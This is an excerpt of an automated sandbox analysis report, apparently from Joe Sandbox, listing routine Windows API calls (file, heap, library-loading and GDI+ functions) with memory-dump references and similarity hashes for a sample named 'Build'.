                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,?,00000000,00000000,00000002,00000000,00000000,?,00000000,?,?,?,0092B967,?,?,009287FD), ref: 0092B0A4
                                                                                                    • CreateFileW.KERNEL32(?,?,00000000,00000000,00000002,00000000,00000000,?,?,00000800,?,?,0092B967,?,?,009287FD), ref: 0092B0D4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 76862c88410273d06cbb8bcbc316fd19354dad5a3d304c1f7a0998b62875ab45
                                                                                                    • Instruction ID: 953d30b501eace5c6922b7d4b45c48be47fb6461e8ea30829dca7e3115cbf157
                                                                                                    • Opcode Fuzzy Hash: 76862c88410273d06cbb8bcbc316fd19354dad5a3d304c1f7a0998b62875ab45
                                                                                                    • Instruction Fuzzy Hash: 7021CC71504384AFE3309F25DC89FB7B7DCEB88324F004A29F9A5C21D5D774A8848B62
                                                                                                    APIs
                                                                                                    • FlushFileBuffers.KERNEL32(?), ref: 0092B7FC
                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 0092B8B0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$BuffersFlushTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 1392018926-0
                                                                                                    • Opcode ID: 9e0ed8772d97515a43bca43b13286ddc42713b9cf375c03d667e4a95617b7f2c
                                                                                                    • Instruction ID: b5524ba54ce88180b40dfd471e8ea2dad194a7bbf10332ae60ee29ad2f4acbbd
                                                                                                    • Opcode Fuzzy Hash: 9e0ed8772d97515a43bca43b13286ddc42713b9cf375c03d667e4a95617b7f2c
                                                                                                    • Instruction Fuzzy Hash: B221D0322493919BC715DF25D891ABABBECAF95304F08491CF4C987191D329E90CDB62
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3746244732-0
                                                                                                    • Opcode ID: c3a67196f1ee7ab7584dfdc27997da425eea828382f54689897d12b4b9d1e4dd
                                                                                                    • Instruction ID: b5ea2922a6d580d742ff78570bf014353d0c12f6201217a19e9330207c450220
                                                                                                    • Opcode Fuzzy Hash: c3a67196f1ee7ab7584dfdc27997da425eea828382f54689897d12b4b9d1e4dd
                                                                                                    • Instruction Fuzzy Hash: DB21AC31940228AFCF11EF94E885EEDB7B6BF88300F10442DF455AB2A1C7795A50CF20
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(00000000,00000001,009860C8,?,?,?,00946386,00000004,InitializeCriticalSectionEx,00959624,InitializeCriticalSectionEx,00000000,?,0094613D,009860C8,00000FA0), ref: 00946215
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0094621F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 3013587201-0
                                                                                                    • Opcode ID: b6cc1c7b7b3426844a089ce59ddda34ec8bdfd08531143356ef112acc01de580
                                                                                                    • Instruction ID: 45d89252b9f706ee3782fd632da647b013c9ab81fd5c9a0455cd8d837360052f
                                                                                                    • Opcode Fuzzy Hash: b6cc1c7b7b3426844a089ce59ddda34ec8bdfd08531143356ef112acc01de580
                                                                                                    • Instruction Fuzzy Hash: 2D1103B1608115AF8F23CFA4DC80C9A73A8FB4B3647140169EA25DB301E770ED01DB92
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 0092B907
                                                                                                    • GetLastError.KERNEL32 ref: 0092B914
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 2976181284-0
                                                                                                    • Opcode ID: 34b513cf18e2272d5587c061de8286dec3b69a07a84c55b7ff4c0e7e3409761f
                                                                                                    • Instruction ID: 29ac903322e216237c12b799cf4b3a74d07fb4cd8337ff509ef1e5081409e881
                                                                                                    • Opcode Fuzzy Hash: 34b513cf18e2272d5587c061de8286dec3b69a07a84c55b7ff4c0e7e3409761f
                                                                                                    • Instruction Fuzzy Hash: 4F110834A04720ABD734D739EC45766B3ECAB45375F600B28E292931D4D774ED85D750
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 0094BB55
                                                                                                      • Part of subcall function 0094BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00946A24,?,0000015D,?,?,?,?,00947F00,000000FF,00000000,?,?), ref: 0094BCC0
                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,?,009650C4,0092190A,?,?,00000007,?,?,?,00921476,?,00000000), ref: 0094BB91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$AllocAllocate_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2447670028-0
                                                                                                    • Opcode ID: f84e0e670e36bb4e9b9cd1fc83eaf5cdf19cfbb9ed95c8f5ecaf6d628bf768dd
                                                                                                    • Instruction ID: 7dd2768f6e56cd4074cb2ca303a0bf458384d57d6537e3854f4d7bf6e8a205bd
                                                                                                    • Opcode Fuzzy Hash: f84e0e670e36bb4e9b9cd1fc83eaf5cdf19cfbb9ed95c8f5ecaf6d628bf768dd
                                                                                                    • Instruction Fuzzy Hash: 60F0B432600315AADB212E6AAC41F6B3B5CDFC1BB1F244126F8159B1A5DF34DC01A1AA
                                                                                                    APIs
                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,0092BF5E,?,?), ref: 0092C305
                                                                                                      • Part of subcall function 0092DA1E: _wcslen.LIBCMT ref: 0092DA59
                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0092BF5E,?,?), ref: 0092C334
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2673547680-0
                                                                                                    • Opcode ID: 9344162d3f8656e8ebe49bfeb726be76efe4e2d1d40b295b93653bf8b42d8796
                                                                                                    • Instruction ID: 31e0d1c972b6616bdb5631d2926a1dea3a59405ce6d5e07bdea1e622831a2cb5
                                                                                                    • Opcode Fuzzy Hash: 9344162d3f8656e8ebe49bfeb726be76efe4e2d1d40b295b93653bf8b42d8796
                                                                                                    • Instruction Fuzzy Hash: ECF09031211229ABDB00DF729C01EEE77ACEF08315F408099B901D7290DA71DE84DBA4
                                                                                                    APIs
                                                                                                    • DeleteFileW.KERNELBASE(?,?,?,?,0092B14B,?,00000000,0092AF6E,1C667296,00000000,0095517A,000000FF,?,00928882,?,?), ref: 0092BC82
                                                                                                      • Part of subcall function 0092DA1E: _wcslen.LIBCMT ref: 0092DA59
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000800,?,0092B14B,?,00000000,0092AF6E,1C667296,00000000,0095517A,000000FF,?,00928882,?), ref: 0092BCAE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DeleteFile$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2643169976-0
                                                                                                    • Opcode ID: 94da087a435135b60a95000359abc329f882f0b12e84230f5c739ce173bce929
                                                                                                    • Instruction ID: 488837116d322734cddec9cc2d7e2f35521454fdee5fe5a80f081fdfabe687f9
                                                                                                    • Opcode Fuzzy Hash: 94da087a435135b60a95000359abc329f882f0b12e84230f5c739ce173bce929
                                                                                                    • Instruction Fuzzy Hash: 88F05E35611229ABDB00DF759D41EEE73ECAF09705F444065BA41D3180EFB1EE889BA4
                                                                                                    APIs
                                                                                                    • _swprintf.LIBCMT ref: 00940341
                                                                                                      • Part of subcall function 00924C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00924C13
                                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 00940358
                                                                                                      • Part of subcall function 0093D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0093D875
                                                                                                      • Part of subcall function 0093D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093D886
                                                                                                      • Part of subcall function 0093D864: IsDialogMessageW.USER32(00010458,?), ref: 0093D89A
                                                                                                      • Part of subcall function 0093D864: TranslateMessage.USER32(?), ref: 0093D8A8
                                                                                                      • Part of subcall function 0093D864: DispatchMessageW.USER32(?), ref: 0093D8B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 2718869927-0
                                                                                                    • Opcode ID: cbec5b1da8bb0d17d34a85227edb26a8f8baca8ca17960017d91769e1b664f9c
                                                                                                    • Instruction ID: e8deb7a4db3b4da0849e3e827a2e273e706b967ac66b047c9298ca2ed2372d4e
                                                                                                    • Opcode Fuzzy Hash: cbec5b1da8bb0d17d34a85227edb26a8f8baca8ca17960017d91769e1b664f9c
                                                                                                    • Instruction Fuzzy Hash: B3F0B4715252186ACB01EB7AED16FEF7BAC9B49305F040056F241A31A2DA74AA409F61
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,?,0092BCD4,?,00928607,?), ref: 0092BCFA
                                                                                                      • Part of subcall function 0092DA1E: _wcslen.LIBCMT ref: 0092DA59
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,?,0092BCD4,?,00928607,?), ref: 0092BD24
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2673547680-0
                                                                                                    • Opcode ID: 7a8564df6e760c55cfcaada7333ce8a5a75dde32fc2a16b4062ed4400c1bcd4b
                                                                                                    • Instruction ID: a42d708a76b9e18a0edba140658ec6b6ee30efa009eed15fb4b6c1ef414156d3
                                                                                                    • Opcode Fuzzy Hash: 7a8564df6e760c55cfcaada7333ce8a5a75dde32fc2a16b4062ed4400c1bcd4b
                                                                                                    • Instruction Fuzzy Hash: 0DF0BE316002285BC700EB79AD01EEEB7FCAB8D761F000165FA01E32C1DBB0AE819B90
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00000002,00000002,?,009331C7,0092D526), ref: 00933191
                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000,?,009331C7), ref: 00933198
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                    • String ID:
                                                                                                    • API String ID: 1231390398-0
                                                                                                    • Opcode ID: 3624f8bad3c525bff93f411d1c3e4e9cf1a2f615e76076c86e0858a029233682
                                                                                                    • Instruction ID: 4b3850b7b8345aa4e778cbc0bce3d688271bf88714143a17e433537c627563de
                                                                                                    • Opcode Fuzzy Hash: 3624f8bad3c525bff93f411d1c3e4e9cf1a2f615e76076c86e0858a029233682
                                                                                                    • Instruction Fuzzy Hash: 92E0D832B582056B9F0987F59C058EB73EDDA44215B108079A503D3200FA38DE054FA0
                                                                                                    APIs
                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 009328D4
                                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00931309,Crypt32.dll,00000000,00931383,00000200,?,00931366,00000000,00000000,?), ref: 009328F4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1175261203-0
                                                                                                    • Opcode ID: b284eaeefa8667f8f9b19daf4aa9d32e016007c520c70c905a99575ef5f7cd91
                                                                                                    • Instruction ID: ce824947846f70bf9bc1dbd4306d914960c2e1d458866c32c87c9d4b44ae1f46
                                                                                                    • Opcode Fuzzy Hash: b284eaeefa8667f8f9b19daf4aa9d32e016007c520c70c905a99575ef5f7cd91
                                                                                                    • Instruction Fuzzy Hash: 57F05E75A10218ABCB10DB66DD05EDFB7FCEF89752F000469B605D3140DA74EA859B64
                                                                                                    APIs
                                                                                                    • LoadStringW.USER32(00927BEB,?,00921436,00927BEB), ref: 009305F8
                                                                                                    • LoadStringW.USER32(00927BEB,?,00921436), ref: 0093060F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LoadString
                                                                                                    • String ID:
                                                                                                    • API String ID: 2948472770-0
                                                                                                    • Opcode ID: 78c6ad327e5cac2dba05bb1252e54cebb659f35189106bdf503ce8105d4da3f5
                                                                                                    • Instruction ID: f0d4a61e8d65537c5ffa416885eeddc9599682ca2a4db3151c8f0d5e45db4d62
                                                                                                    • Opcode Fuzzy Hash: 78c6ad327e5cac2dba05bb1252e54cebb659f35189106bdf503ce8105d4da3f5
                                                                                                    • Instruction Fuzzy Hash: 1CF09835118219BBDF111F91EC18DABBF6AFF89794B054425FD1996231D632C860EBA0
                                                                                                    APIs
                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,0095505D,000000FF), ref: 0093CD7D
                                                                                                    • OleUninitialize.OLE32(?,?,?,?,0095505D,000000FF), ref: 0093CD82
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 3856339756-0
                                                                                                    • Opcode ID: 3e1752bb23446d1dc0d04d9c8001585497daa1e058f6344ad0d5f30f53f5f3c3
                                                                                                    • Instruction ID: a100c3125910587f9f3cbbcce84f8c784b749ac6fee712507443d53309cc3faa
                                                                                                    • Opcode Fuzzy Hash: 3e1752bb23446d1dc0d04d9c8001585497daa1e058f6344ad0d5f30f53f5f3c3
                                                                                                    • Instruction Fuzzy Hash: 9DF05476608644AFC700DF55DD05F59FBA8FB49720F00426AF815C37A0DB74A801CB90
                                                                                                    APIs
                                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0093C36E
                                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0093C375
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
